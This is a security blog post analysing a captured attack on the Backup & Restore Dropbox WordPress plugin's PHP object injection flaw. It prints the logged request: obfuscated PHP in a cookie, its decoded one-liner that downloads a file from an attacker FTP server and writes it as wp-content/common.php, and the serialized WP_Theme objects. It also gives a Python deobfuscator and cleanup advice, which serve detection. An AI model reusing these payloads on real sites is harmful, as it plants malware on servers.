The WordPress plugin Backup & Restore Dropbox has a PHP Object Injection vulnerability: user-controlled data is passed to unserialize(), so a remote attacker can hand the site an arbitrary object graph and use it to download malware onto the server.
The vulnerability was found and published by pluginvulnerabilities.com.
We caught a live exploitation attempt against it. The attacker's aim was to fetch a malware file from their own FTP server and drop it into the site as common.php.
Real Post Payload
The request below comes from a ModSecurity audit log. The --5232150d-B-- part is the request headers and the --5232150d-C-- part is the request body.

--5232150d-B--
POST / HTTP/1.1
Accept-Encoding: identity
Content-Length: 791
Host: malware.expert
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36
Connection: close
Cookie: cmd=echo%208a44d571857dd91b3fca6d302776b2ea; code=%24str%3Dfile_get_coNteNts%28chr%28102%29.chr%28116%29.chr%28112%29.chr%2858%29.chr%2847%29.chr%2847%29.chr%2897%29.chr%28110%29.chr%28111%29.chr%28110%29.chr%28121%29.chr%28109%29.chr%28111%29.chr%28117%29.chr%28115%29.chr%2858%29.chr%2849%29.chr%2850%29.chr%2851%29.chr%2864%29.chr%2853%29.chr%2852%29.chr%2846%29.chr%2849%29.chr%2853%29.chr%2851%29.chr%2846%29.chr%2852%29.chr%2854%29.chr%2846%29.chr%2856%29.chr%2853%29.chr%2858%29.chr%2856%29.chr%2848%29.chr%2847%29.chr%28116%29.chr%28109%29.chr%28112%29.chr%2847%29.chr%28116%29.chr%28109%29.chr%28112%29.chr%2847%29.chr%2897%29.chr%28110%29.chr%28111%29.chr%28110%29.chr%2844%29.chr%2847%29.chr%28116%29.chr%28101%29.chr%28115%29.chr%28116%29.chr%2846%29.chr%28112%29.chr%28104%29.chr%28112%29%29%3B+file_put_coNteNts%28ABSPATH.chr%2847%29.chr%28119%29.chr%28112%29.chr%2845%29.chr%2899%29.chr%28111%29.chr%28110%29.chr%28116%29.chr%28101%29.chr%28110%29.chr%28116%29.chr%2847%29.chr%2899%29.chr%28111%29.chr%28109%29.chr%28109%29.chr%28111%29.chr%28110%29.chr%2846%29.chr%28112%29.chr%28104%29.chr%28112%29%2C%24str%29%3B+die%28%29%3B;
Content-Type: application/x-www-form-urlencoded

The interesting part of the headers is the Cookie. The cmd value is "echo 8a44d571857dd91b3fca6d302776b2ea", the kind of token echo an attacker's tool uses to confirm that injected code actually ran. The code value is URL-encoded PHP in which every string is built from chr() calls so that neither the FTP URL nor the file name appears in clear text. With the chr() sequences resolved it reads:

$str=file_get_contents('ftp://anonymous:123@54.153.46.85:80/tmp/tmp/anon,/test.php'); file_put_contents(ABSPATH.'/wp-content/common.php',$str); die();

First file_get_contents() downloads test.php from the attacker's FTP server (anonymous login, FTP served on port 80, which is likely chosen to pass outbound firewall rules), then file_put_contents() writes it into the site's wp-content directory as common.php, and die() stops the page so nothing else is rendered. The builtins are spelled file_get_coNteNts and file_put_coNteNts because PHP resolves function names case-insensitively; the mixed case only exists to defeat case-sensitive string signatures.

--5232150d-C--
dropbox-backup_request=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
dropbox-backup_request decoded
Array
(
    [method] => __PHP_Incomplete_Class Object
        (
            [__PHP_Incomplete_Class_Name] => WP_Theme
            [headers:WP_Theme:private] => Array
                (
                    [Name] => 1 name here
                    [TextDomain] => en_US
                    [DomainPath] => ,
                )
            [theme_root:WP_Theme:private] => ftp:/
            [stylesheet:WP_Theme:private] => anonymous:123@54.153.46.85:80/tmp/tmp/anon
            [cache] => Array
                (
                )
        )
    [params] => __PHP_Incomplete_Class Object
        (
            [__PHP_Incomplete_Class_Name] => WP_Theme
            [headers:WP_Theme:private] => Array
                (
                    [Name] => 1 name here
                    [TextDomain] => en_US
                    [DomainPath] => ,
                )
            [theme_root:WP_Theme:private] => ftp:/
            [stylesheet:WP_Theme:private] => anonymous:123@54.153.46.85:80/tmp/tmp/anon
            [cache] => Array
                (
                )
        )
)

Both the method and the params entries unserialize to WP_Theme objects. They print as __PHP_Incomplete_Class here only because the script used to decode the payload did not have the WP_Theme class loaded; inside WordPress the class exists, so the real objects are created with their private properties set by the attacker. The theme_root value "ftp:/" and the stylesheet value "anonymous:123@54.153.46.85:80/tmp/tmp/anon" are joined by WP_Theme with a slash when it builds the theme's stylesheet directory, which yields ftp://anonymous:123@54.153.46.85:80/tmp/tmp/anon, the same server and directory the cookie fetches from; the DomainPath value "," likewise matches the "anon," directory in the cookie's FTP URL. In other words, the serialized objects point WordPress's theme handling at the attacker's FTP server rather than at a local theme directory.
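The script below is an added example for this post, not the plugin's code and not part of the captured attack. It takes the Cookie header from the log above, URL-decodes it, folds every chr(N).chr(M)... run into the string it spells, lowercases the call names (PHP treats them case-insensitively), and then reports the indicators a signature can key on once the code is normalised. The cookie value is copied from the request above; the function and indicator names (remote_fetch, php_dropper) are this example's own.

```python
"""Decode the obfuscated PHP carried in the Cookie header of the captured request."""
import re
from urllib.parse import unquote_plus

# Cookie header copied from the ModSecurity log above (constructed input for this
# example; the attacker's IP, credentials and paths are exactly as logged).
COOKIE_HEADER = (
    "cmd=echo%208a44d571857dd91b3fca6d302776b2ea; "
    "code=%24str%3Dfile_get_coNteNts%28"
    "chr%28102%29.chr%28116%29.chr%28112%29.chr%2858%29.chr%2847%29.chr%2847%29."
    "chr%2897%29.chr%28110%29.chr%28111%29.chr%28110%29.chr%28121%29.chr%28109%29."
    "chr%28111%29.chr%28117%29.chr%28115%29.chr%2858%29.chr%2849%29.chr%2850%29."
    "chr%2851%29.chr%2864%29.chr%2853%29.chr%2852%29.chr%2846%29.chr%2849%29."
    "chr%2853%29.chr%2851%29.chr%2846%29.chr%2852%29.chr%2854%29.chr%2846%29."
    "chr%2856%29.chr%2853%29.chr%2858%29.chr%2856%29.chr%2848%29.chr%2847%29."
    "chr%28116%29.chr%28109%29.chr%28112%29.chr%2847%29.chr%28116%29.chr%28109%29."
    "chr%28112%29.chr%2847%29.chr%2897%29.chr%28110%29.chr%28111%29.chr%28110%29."
    "chr%2844%29.chr%2847%29.chr%28116%29.chr%28101%29.chr%28115%29.chr%28116%29."
    "chr%2846%29.chr%28112%29.chr%28104%29.chr%28112%29%29%3B+"
    "file_put_coNteNts%28ABSPATH."
    "chr%2847%29.chr%28119%29.chr%28112%29.chr%2845%29.chr%2899%29.chr%28111%29."
    "chr%28110%29.chr%28116%29.chr%28101%29.chr%28110%29.chr%28116%29.chr%2847%29."
    "chr%2899%29.chr%28111%29.chr%28109%29.chr%28109%29.chr%28111%29.chr%28110%29."
    "chr%2846%29.chr%28112%29.chr%28104%29.chr%28112%29%2C%24str%29%3B+die%28%29%3B;"
)

# A run of chr(N) calls joined by "." (the trailing "." is deliberately not consumed,
# so "chr(47).ABSPATH" would keep its concatenation operator).
_CHR_RUN = re.compile(r"chr\(\d+\)(?:\s*\.\s*chr\(\d+\))*", re.IGNORECASE)
_CHR_ONE = re.compile(r"chr\((\d+)\)", re.IGNORECASE)
# identifier immediately followed by "(" : a function call
_CALL = re.compile(r"\b([A-Za-z_]\w*)\s*\(")
# single-quoted PHP string literal, honouring backslash escapes
_STRING = re.compile(r"'((?:[^'\\]|\\.)*)'")


def parse_cookie_header(header: str) -> dict:
    """Split a raw Cookie header into {name: url-decoded value}."""
    cookies = {}
    for part in header.split(";"):
        part = part.strip()
        if not part:
            continue
        name, _, value = part.partition("=")
        cookies[name.strip()] = unquote_plus(value)
    return cookies


def fold_chr_runs(php: str) -> str:
    """Replace each chr(N).chr(M)... run with the PHP string literal it builds."""
    def repl(match):
        text = "".join(chr(int(c)) for c in _CHR_ONE.findall(match.group(0)))
        return "'" + text.replace("\\", "\\\\").replace("'", "\\'") + "'"
    return _CHR_RUN.sub(repl, php)


def lowercase_calls(php: str) -> str:
    """PHP function names are case-insensitive, so normalise them before matching.
    Note: this is a plain regex, so it would also touch call-shaped text inside
    string literals; fine for triage, not a PHP parser."""
    return _CALL.sub(lambda m: m.group(1).lower() + "(", php)


def deobfuscate(php: str) -> str:
    """Full normalisation: fold chr() runs, then lowercase call names."""
    return lowercase_calls(fold_chr_runs(php))


def string_literals(php: str) -> list:
    """All single-quoted string literals in (normalised) PHP, in order."""
    return [m.group(1) for m in _STRING.finditer(php)]


def indicators(php: str) -> list:
    """Dropper indicators on normalised code: a remote fetch, and a write to a .php path."""
    found = []
    lits = string_literals(php)
    if "file_get_contents(" in php and any(
            re.match(r"(?:ftp|https?)://", s, re.IGNORECASE) for s in lits):
        found.append("remote_fetch")
    if "file_put_contents(" in php and any(s.lower().endswith(".php") for s in lits):
        found.append("php_dropper")
    return found


if __name__ == "__main__":
    cookies = parse_cookie_header(COOKIE_HEADER)
    code = deobfuscate(cookies["code"])
    print("cmd  :", cookies["cmd"])
    print("code :", code)
    print("urls/paths:", string_literals(code))
    print("indicators:", indicators(code))
```

Run it and the code cookie comes out as one readable line with the FTP URL and the /wp-content/common.php target in clear text. The point of the normalisation step is that a signature written against the decoded, lowercased form matches this sample and any re-encoding of it, whereas a signature on the literal bytes in the log matches only this one variant.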
Use Malware Expert signatures to detect this malware in PHP files and clean it up. If the site ran a vulnerable version of the plugin, also check wp-content for an unexpected common.php and search the web server logs for POST requests carrying a dropbox-backup_request parameter.